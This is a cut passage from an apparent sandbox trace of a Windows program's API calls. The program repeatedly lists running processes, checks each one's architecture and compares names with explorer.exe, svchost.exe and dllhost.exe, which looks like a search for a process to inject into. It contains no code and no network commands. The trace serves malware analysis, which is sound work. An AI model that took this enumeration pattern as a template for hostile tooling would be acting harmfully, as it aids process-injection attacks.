th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0195.664] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0195.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0195.665] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.665] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.665] CloseHandle (hObject=0xec) returned 1 [0195.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0195.666] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.666] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.666] CloseHandle (hObject=0xec) returned 1 [0195.666] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0195.666] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0195.667] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.667] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.667] CloseHandle (hObject=0xec) returned 1 [0195.667] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0195.667] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0195.668] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.668] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.668] CloseHandle (hObject=0xec) returned 1 [0195.668] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.668] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0195.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.669] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.669] CloseHandle (hObject=0xec) returned 1 [0195.669] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0195.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0195.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.669] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0195.669] CloseHandle (hObject=0xec) returned 1 [0195.669] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0195.670] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0195.670] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0195.670] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0195.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0195.670] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0195.671] CloseHandle (hObject=0xe8) returned 1 [0195.671] Sleep (dwMilliseconds=0x3e8) [0196.694] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0196.696] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0196.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0196.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0196.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0196.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0196.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0196.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0196.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0196.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0196.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0196.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0196.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0196.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0196.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0196.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0196.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0196.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0196.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0196.704] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0196.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0196.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0196.706] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.706] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.706] CloseHandle (hObject=0xec) returned 1 [0196.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0196.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0196.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0196.707] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.707] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.707] CloseHandle (hObject=0xec) returned 1 [0196.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0196.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0196.708] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0196.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0196.708] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.708] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.708] CloseHandle (hObject=0xec) returned 1 [0196.708] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0196.708] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0196.708] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0196.708] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0196.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0196.709] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.709] CloseHandle (hObject=0xec) returned 1 [0196.709] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0196.709] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0196.709] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0196.709] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0196.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0196.710] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.710] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.710] CloseHandle (hObject=0xec) returned 1 [0196.710] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0196.710] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0196.710] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0196.710] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0196.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0196.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.711] CloseHandle (hObject=0xec) returned 1 [0196.711] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0196.711] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0196.711] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0196.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0196.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0196.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.711] CloseHandle (hObject=0xec) returned 1 [0196.711] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0196.711] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0196.711] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0196.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0196.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0196.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.712] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.712] CloseHandle (hObject=0xec) returned 1 [0196.712] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0196.712] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0196.712] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0196.712] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0196.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0196.713] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.713] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.713] CloseHandle (hObject=0xec) returned 1 [0196.713] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0196.713] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0196.713] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0196.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0196.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0196.713] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.713] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.713] CloseHandle (hObject=0xec) returned 1 [0196.713] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0196.713] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0196.713] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0196.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0196.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0196.714] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.714] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.714] CloseHandle (hObject=0xec) returned 1 [0196.714] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0196.714] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0196.714] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0196.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0196.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0196.715] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.715] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.715] CloseHandle (hObject=0xec) returned 1 [0196.715] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0196.715] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0196.715] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0196.715] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0196.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0196.715] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.715] IsWow64Process (in: 